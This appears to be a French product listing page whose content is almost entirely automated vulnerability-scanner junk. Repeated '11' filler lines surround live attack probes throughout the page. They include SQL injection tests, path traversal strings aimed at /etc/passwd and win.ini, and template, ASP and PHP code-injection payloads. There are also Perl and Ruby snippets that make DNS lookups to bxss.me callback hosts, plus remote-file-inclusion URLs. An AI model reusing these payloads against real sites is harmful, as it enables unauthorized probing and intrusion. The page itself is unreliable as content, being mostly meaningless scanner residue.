NOS PRODUITS

1

WACKER IRSEN
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1CvtbLo2O1
11
11
11
11
11
11
11
11
11
11
11
11
response.write(9100996*9633071)1
11
"+response.write(9100996*9633071)+"1
11
11
11
11cP7ovDCO
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1response.write(9162552*9734908)
1"+response.write(9162552*9734908)+"
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
Iw4nFumY1
11
e2R6iXkg1
11
11
11
11
11
11
11
11
-1 OR 2+662-662-1=0+0+0+1 -- 1
-1 OR 3+662-662-1=0+0+0+1 -- 1
-1 OR 3*2<(0+5+662-662) -- 1
11
-1 OR 3*2>(0+5+662-662) -- 1
-1 OR 2+12-12-1=0+0+0+11
11
11
11
11
11
11
-1" OR 2+799-799-1=0+0+0+1 -- 1
11
11
-1" OR 3+799-799-1=0+0+0+1 -- 1
11
11
11
11
1%2527%25221
11
@@Ep2ne1
11
11
11
1lwOOUfUs
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
../../../../../../../../../../../../../../etc/passwd1
../../../../../../../../../../../../../../windows/win.ini1
11
../11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
${9999654+9999977}1
11
11
11
11
11
11
11
11
1${10000224+9999570}
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg1
11
11
1some_inexistent_file_with_long_name%00.jpg1
11
Http://bxss.me/t/fit.txt1
1&n996081=v9728931
http://bxss.me/t/fit.txt%3F.jpg1
11
11
bxss.me1
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11&n908912=v964199
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
Array1
11
11
)1
11
11
11
1../../../../../../../../../../../../../../etc/passwd
!(()&&!|*|*|1
11
1../../../../../../../../../../../../../../windows/win.ini
11
11
^(#$!@#$)(()))******1
1../1
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1Array
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
".gethostbyname(lc("hitue"."ehubkxls6d83c.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(78).chr(106).chr(66)."1
11
11
1)
11
11
1!(()&&!|*|*|
11
11
1^(#$!@#$)(()))******
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1".gethostbyname(lc("hitoc"."jddiszyrfe4c3.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(73).chr(120).chr(79)."
11
11
11
11
11
1http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
11
11
11
11some_inexistent_file_with_long_name%00.jpg
1Http://bxss.me/t/fit.txt
11
11
11
11
1http://bxss.me/t/fit.txt%3F.jpg
11
11
11
11
1bxss.me
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
HttP://bxss.me/t/xss.html?%001
";print(md5(31337));$a="1
11
11
${@print(md5(31337))}1
bxss.me/t/xss.html?%001
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1HttP://bxss.me/t/xss.html?%00
11
11
11
1bxss.me/t/xss.html?%00
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
"+"A".concat(70-3).concat(22*4).concat(113).concat(65).concat(100).concat(67)+(require"socket" Socket.gethostbyname("hitet"+"mcwkpzap3d286.bxss.me.")[3].to_s)+"1
11
11
11
11
11
11
11
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))1
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
/xfs.bxss.me1
11
1)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1"+"A".concat(70-3).concat(22*4).concat(110).concat(71).concat(99).concat(86)+(require"socket" Socket.gethostbyname("hitnb"+"xcgbtlag73148.bxss.me.")[3].to_s)+"
11
11
11
11
11
11
11
11
11
11
11
11
11
11
1";print(md5(31337));$a="